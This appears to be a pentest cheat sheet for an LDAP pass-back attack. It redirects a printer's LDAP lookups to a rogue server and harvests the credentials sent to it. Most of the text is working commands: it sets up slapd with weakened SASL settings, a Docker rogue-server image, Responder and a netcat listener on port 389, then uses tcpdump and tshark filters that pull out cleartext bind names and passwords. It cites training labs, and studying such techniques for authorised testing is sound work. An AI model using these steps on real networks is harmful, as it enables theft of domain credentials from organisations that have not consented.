LDAP Pass-back Attack

Requirements

1. Access to a host that can connect to the LDAP server (e.g., a printer).

2. The ability to modify the LDAP IP and trigger an LDAP connection session from the target (e.g., through the printer's web interface).

3. The ability to set up a malicious LDAP server with a weak authentication mechanism (e.g., using nc, Docker, or Responder).

---

Setting Up a Rogue LDAP Server

1. Real LDAP Server

Install and configure the LDAP server:

sudo apt-get update && sudo apt-get -y install slapd ldap-utils
sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd

Set up a weak authentication mechanism:

Create a file olcSaslSecProps.ldif with the following content:

dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

Apply the configuration and restart the service:

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo service slapd restart

Verify supported SASL mechanisms:

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

---

2. Docker Setup

Use a pre-built Docker image for the rogue LDAP server:

git clone https://github.com/pedrojosenavasperez/ldap-passback-docker.git
cd ldap-passback-docker/
docker buildx build -t ldap-passback .
docker run --rm -ti -p 389:389 ldap-passback

---

3. Responder

Use Responder to capture LDAP requests:

sudo responder -I <interface>

---

4. Netcat

Set up a listener on port 389 using Netcat:

nc -lvp 389

---

Gathering Credentials

You can use network analysis tools to extract credentials sent to the rogue LDAP server.

Using tcpdump:

Capture raw LDAP traffic on port 389:

sudo tcpdump -SX -i <interface> tcp port 389

Using tshark:

Filter for LDAP credentials in captured traffic:

tshark -i any -f "port 389" -Y "ldap.protocolOp == 0 && ldap.simple" \
-e ldap.name -e ldap.simple -Tjson 2> /dev/null

---

References

• TryHackMe: Breaching Active Directory

• Acceis: LDAP Passback Attack

• Ldap-passback-docker